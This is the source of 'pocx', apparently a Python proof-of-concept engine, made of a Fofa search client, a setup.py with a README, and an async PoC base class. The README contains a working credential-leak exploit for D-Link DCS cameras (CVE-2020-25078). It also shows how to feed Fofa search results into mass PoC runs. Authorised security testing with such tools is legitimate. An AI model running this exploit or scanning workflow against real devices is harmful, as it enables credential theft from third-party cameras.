import requests
import json
import base64
from loguru import logger


class Fofa():
    @logger.catch(level='ERROR')
    def __init__(self):
        """

        Initialize the Fofa API.

        """
        self.key = ''
        self.email = ''
        self.domain = ''

    @logger.catch(level='ERROR')
    def set_config(self, api_key: str, api_email: str, domain: str = 'fofa.info'):
        """

        Setting the configuration for the Fofa API.

        :param api_key: the fofa api key
        :param api_email: the fofa account email
        :param domain: the fofa domain
        :return:
        """
        self.key = api_key
        self.email = api_email
        self.domain = domain

    @logger.catch(level='ERROR')
    def _grammar_b64(self, grammar: str):
        """

        Transform the grammar to base64.

        :param grammar: the fofa search grammar
        :return: the base64 grammar
        """
        b64 = base64.b64encode(grammar.encode()).decode()
        for i in range(b64.count('=')):
            b64.replace('=', '%3D')
        return b64

    @logger.catch(level='ERROR')
    def _search(self, grammar: str, page: int = 1, size: int = 100):
        """

        The core method for searching the fofa.

        :param grammar: the search grammar
        :param page: the page to search
        :param size: the size of the page
        :return: the search results
        """
        b64 = self._grammar_b64(grammar)
        furl = f'https://{self.domain}/api/v1/search/all?email={self.email}&key={self.key}&qbase64={b64}&{grammar}&page={page}&size={size}'
        try:
            assets = requests.get(furl).content.decode('utf-8')
            return json.loads(assets)
        except Exception as e:
            logger.error(e)
            return None

    @logger.catch(level='ERROR')
    def assets(self, grammar: str, page: int = 1, size: int = 100):
        """

        Gain the assets from the fofa.

        :param grammar: the search grammar
        :param page: the page to search
        :param size: the size of the page
        :return: the fofa assets
        """
        results = self._search(grammar, page, size)
        targets = []
        if not results:
            return targets
        for asset in results['results']:
            target = f'https://{asset[1]}:{asset[2]}' if int(asset[2]) == 443 else f'http://{asset[1]}:{asset[2]}'
            targets.append(target)
        return list(set(targets))

    @logger.catch(level='ERROR')
    def asset_counts(self, grammar: str):
        """

        Get the asset counts from the fofa, which search the given grammar.

        :param grammar: the search grammar
        :return: the asset counts
        """
        results = self._search(grammar, 1, 1)
        if not results:
            return 0
        return results['size']

    @logger.catch(level='ERROR')
    def asset_pages(self, grammar: str, size: int = 100):
        """

        Get the asset pages from the fofa, which search the given grammar.

        :param grammar: the search grammar
        :param size: the size of the page
        :return: the pages of the asset counts
        """
        results = self._search(grammar, 1, 1)
        if not results:
            return 1
        count = results['size'] % size
        pages = results['size'] // size if count == 0 else results['size'] // size + 1
        return pages



# -*- coding: utf-8 -*-
from setuptools import setup

packages = \
['pocx', 'pocx.funcs']

package_data = \
{'': ['*']}

install_requires = \
['httpx>=0.22.0,<0.23.0', 'loguru>=0.6.0,<0.7.0']

setup_kwargs = {
    'name': 'pocx',
    'version': '0.1.5',
    'description': 'A Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.',
    'long_description': '# pocx\nA Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.\n## Install\n\n```bash\npip3 install pocx\n```\n\n## Usage\n\n### POC Template\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: wkaifeng2007@163.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\n\n\nclass POC(BasicPoc):\n    def __init__(self):\n        self.name = \'poc\'\n        super(POC, self).__init__()\n\n    def poc(self, target):\n        your poc code here.\n\n\nif __name__ == \'__main__\':\n    target = \'http://127.0.0.1\'\n    cve = POC()\n    cve.run(target)\n```\n\n### Synchronous Mode Example\n\n```python\n# Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078\n# Author: antx\n# Email: wkaifeng2007@163.com\n# CVE: CVE-2020-25078\n\nfrom pocx import BasicPoc\nfrom loguru import logger\n\n\nclass DLinkPoc(BasicPoc):\n    @logger.catch(level=\'ERROR\')\n    def __init__(self):\n        self.name = \'D_Link-DCS-2530L\'\n        super(DLinkPoc, self).__init__()\n\n    @logger.catch(level=\'ERROR\')\n    def poc(self, target: str):\n        poc_url = \'/config/getuser?index=0\'\n        try:\n            resp = self.get(target + poc_url)\n            if resp.status_code == 200 and \'name\' in resp.text and \'pass\' in resp.text:\n                logger.success(resp.text)\n            elif resp.status_code == 500:\n                logger.error(f\'[-] {target} {resp.status_code}\')\n        except Exception as e:\n            logger.error(f\'[-] {target} {e}\')\n\n\nif __name__ == \'__main__\':\n    target = \'http://127.0.0.1\'\n    cve = DLinkPoc()\n    cve.run(target)\n```\n\n### Asynchronous Mode Example\n\n```python\n# Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078\n# Author: antx\n# Email: wkaifeng2007@163.com\n# CVE: CVE-2020-25078\n\nfrom pocx import AioPoc\nfrom loguru import logger\n\n\nclass DLinkPoc(AioPoc):\n    @logger.catch(level=\'ERROR\')\n    def __init__(self):\n        self.name = \'D_Link-DCS-2530L\'\n        super(DLinkPoc, self).__init__()\n\n    @logger.catch(level=\'ERROR\')\n    async def poc(self, target: str):\n        poc_url = \'/config/getuser?index=0\'\n        try:\n            resp = await self.aio_get(target + poc_url)\n            if resp.status_code == 200 and \'name\' in resp.text and \'pass\' in resp.text:\n                logger.success(resp.text)\n            elif resp.status_code == 500:\n                logger.error(f\'[-] {target} {resp.status_code}\')\n        except Exception as e:\n            logger.error(f\'[-] {target} {e}\')\n\n\nif __name__ == \'__main__\':\n    target = \'http://127.0.0.1\'\n    cve = DLinkPoc()\n    cve.run(target)\n```\n\n### Useful Functions\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: wkaifeng2007@163.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Fofa\n\n\nclass POC(BasicPoc):\n    def __init__(self):\n        self.name = \'poc\'\n        super(POC, self).__init__()\n\n    def poc(self, target):\n        your poc code here.\n\n    def assets(self, grammar: str):\n        fofa = Fofa()\n        fofa.set_config(api_key=\'xxxxxx\', api_email=\'xxxxxx\')  \n        assets = fofa.assets(grammar)\n        return assets\n\nif __name__ == \'__main__\':\n    grammar = \'app="xxxxxx"\'\n    cve = POC()\n    result = cve.assets(grammar)\n    cve.run(result)\n```\n\nor \n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: wkaifeng2007@163.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Fofa\n\n\nclass POC(BasicPoc):\n    def __init__(self):\n        self.name = \'poc\'\n        super(POC, self).__init__()\n\n    def poc(self, target):\n        your poc code here.\n\n\nif __name__ == \'__main__\':\n    grammar = \'app="xxxxxx"\'\n    cve = POC()\n    fofa = Fofa()\n    fofa.set_config(api_key=\'xxxxxx\', api_email=\'xxxxxx\')\n    print(f\'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}\')\n    pages = fofa.asset_pages(grammar)\n    for page in range(1, pages + 1):\n        print(f\'[*] page {page}\')\n        assets = fofa.assets(grammar, page)\n        cve.run(assets)\n```\n',
    'author': 'antx',
    'author_email': 'wkaifeng2007@163.com',
    'maintainer': None,
    'maintainer_email': None,
    'url': 'https://github.com/antx-code/pocx',
    'packages': packages,
    'package_data': package_data,
    'install_requires': install_requires,
    'python_requires': '>=3.8,<4.0',
}


setup(**setup_kwargs)



from abc import ABCMeta, abstractmethod
from loguru import logger
import asyncio
import httpx
import urllib3
urllib3.disable_warnings()


class AioPoc(metaclass=ABCMeta):
    @logger.catch(level='ERROR')
    def __init__(self) -> None:
        self.mode = 'Asynchronous Mode'
        self.name = "AioPoc"
        self.example = ""
        self.session = httpx.AsyncClient(verify=False)
        self.session.headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"}

    @logger.catch(level='ERROR')
    def set_headers(self, headers: dict = None):
        if headers is not None:
            self.session.headers = headers

    @logger.catch(level='ERROR')
    async def aio_request(self, url: str, method: str = 'get', timeout: int = 10, **kwargs) -> httpx.Response:
        try:
            resp = await self.session.request(method, url, timeout=timeout, **kwargs)
        except httpx.RequestError as e:
            logger.error(f'[-] Run Poc[{self.name}] => {url} Error:\n\t{e}')
            resp = None
        return resp

    @logger.catch(level='ERROR')
    async def aio_get(self, url: str, **kwargs) -> httpx.Response:
        return await self.aio_request(url, method='get', **kwargs)

    @logger.catch(level='ERROR')
    async def aio_post(self, url: str, **kwargs) -> httpx.Response:
        return await self.aio_request(url, method='post', **kwargs)

    @logger.catch(level='ERROR')
    async def aio_put(self, url: str, **kwargs) -> httpx.Response:
        return await self.aio_request(url, method='put', **kwargs)

    @logger.catch(level='ERROR')
    async def aio_head(self, url: str, **kwargs) -> httpx.Response:
        return await self.aio_request(url, method='head', **kwargs)

    @logger.catch(level='ERROR')
    async def aio_delete(self, url: str, **kwargs) -> httpx.Response:
        return await self.aio_request(url, method='delete', **kwargs)

    @abstractmethod
    @logger.catch(level='ERROR')
    async def poc(self, target: str) -> bool:
        pass

    @logger.catch(level='ERROR')
    def run(self, target):
        logger.info(f'testing {self.name} with {self.mode}.')

        targets = [target] if isinstance(target, str) else target

        loop = asyncio.get_event_loop()
        loop.run_until_complete(asyncio.gather(*[self.poc(target) for target in targets]))
